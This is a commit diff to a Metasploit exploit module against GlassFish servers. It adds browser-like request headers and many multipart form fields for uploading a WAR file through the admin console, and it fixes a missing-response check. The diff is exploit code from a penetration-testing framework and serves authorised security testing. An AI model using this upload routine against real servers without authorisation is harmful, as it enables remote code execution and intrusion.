Land #7255, Fix issue causing Glassfish to fail uploading to Windows targets.
This commit is contained in:
commit
6509b34da1
|
@ -67,6 +67,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
headers = {}
|
||||
headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
|
||||
headers['Content-Type'] = ctype if ctype
|
||||
headers['Connection'] = 'keep-alive'
|
||||
headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
|
||||
headers['Accept-Language'] = 'en-US,en;q=0.5'
|
||||
headers['Accept-Encoding'] = 'gzip, deflate, br'
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => path,
|
||||
|
@ -475,6 +479,39 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
|
||||
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
|
||||
format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
|
||||
format(boundary,"form:other:psection:descriptionProp:description", ""),
|
||||
format(boundary,"form:other:psection:librariesProp:library", ""),
|
||||
format(boundary,"form:other:psection:deploymentOrder:deploymentOrder", ""),
|
||||
format(boundary,"form:other:psection:implicitCdi:implicitCdi", "true"),
|
||||
format(boundary,"form:other:psection:enableProp:sun_checkbox44","true"),
|
||||
format(boundary,"form:war:psection:enableProp:sun_checkbox42","true"),
|
||||
format(boundary,"form:other:psection:vsProp:vs",""),
|
||||
format(boundary,"form:rar:psection:implicitCdi:implicitCdi","true"),
|
||||
format(boundary,"form:rar:psection:deploymentOrder:deploymentOrder",""),
|
||||
format(boundary,"form:rar:psection:enableProp:sun_checkbox40","true"),
|
||||
format(boundary,"form:other:psection:nameProp:appName", app_base),
|
||||
format(boundary,"form:rar:psection:nameProp:appName", app_base),
|
||||
format(boundary,"form:jar:psection:nameProp:appName", app_base),
|
||||
format(boundary,"form:ear:psection:nameProp:appName", app_base),
|
||||
format(boundary,"form:ear:psection:descriptionProp:description",""),
|
||||
format(boundary,"form:jar:psection:deploymentOrder:deploymentOrder", ""),
|
||||
format(boundary,"form:jar:psection:implicitCdi:implicitCdi","true"),
|
||||
format(boundary,"form:ear:psection:jw:jwc","true"),
|
||||
format(boundary,"form:ear:psection:vsProp:vs",""),
|
||||
format(boundary,"form:appClient:psection:deploymentOrder:deploymentOrder",""),
|
||||
format(boundary,"form:jar:psection:enableProp:sun_checkbox38","true"),
|
||||
format(boundary,"form:jar:psection:descriptionProp:description", ""),
|
||||
format(boundary,"form:ear:psection:implicitCdi:implicitCdi","true"),
|
||||
format(boundary,"form:appClient:psection:implicitCdi:implicitCdi","true"),
|
||||
format(boundary,"form:ear:psection:enableProp:sun_checkbox36","true"),
|
||||
format(boundary,"form:war:psection:deploymentOrder:deploymentOrder",""),
|
||||
format(boundary,"form:jar:psection:librariesProp:library",""),
|
||||
format(boundary,"form:appClient:psection:jw:jwt","true"),
|
||||
format(boundary,"form:ear:psection:librariesProp:library", ""),
|
||||
format(boundary,"form:sheet1:sun_propertySheetSection23:type:appType","war"),
|
||||
format(boundary,"form:ear:psection:deploymentOrder:deploymentOrder",""),
|
||||
format(boundary,"form:rar:psection:descriptionProp:description",""),
|
||||
format(boundary,"form:war:psection:implicitCdi:implicitCdi","true"),
|
||||
format(boundary,"form:war:psection:librariesProp:library"),
|
||||
format(boundary,"form:war:psection:descriptionProp:description"),
|
||||
format(boundary,"form_hidden","form_hidden"),
|
||||
|
@ -499,7 +536,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def get_viewstate(body)
|
||||
@vewstate ||= lambda {
|
||||
noko = Nokogiri::HTML(body)
|
||||
inputs = noko.search('input')
|
||||
hidden_inputs = []
|
||||
|
@ -511,7 +547,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
''
|
||||
}.call
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -587,7 +622,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
|
||||
|
||||
# Print upload result
|
||||
if res.code == 302
|
||||
if res && res.code == 302
|
||||
print_status("Successfully uploaded")
|
||||
else
|
||||
print_error("Error uploading #{res.code}")
|
||||
|
|
Loading…
Reference in New Issue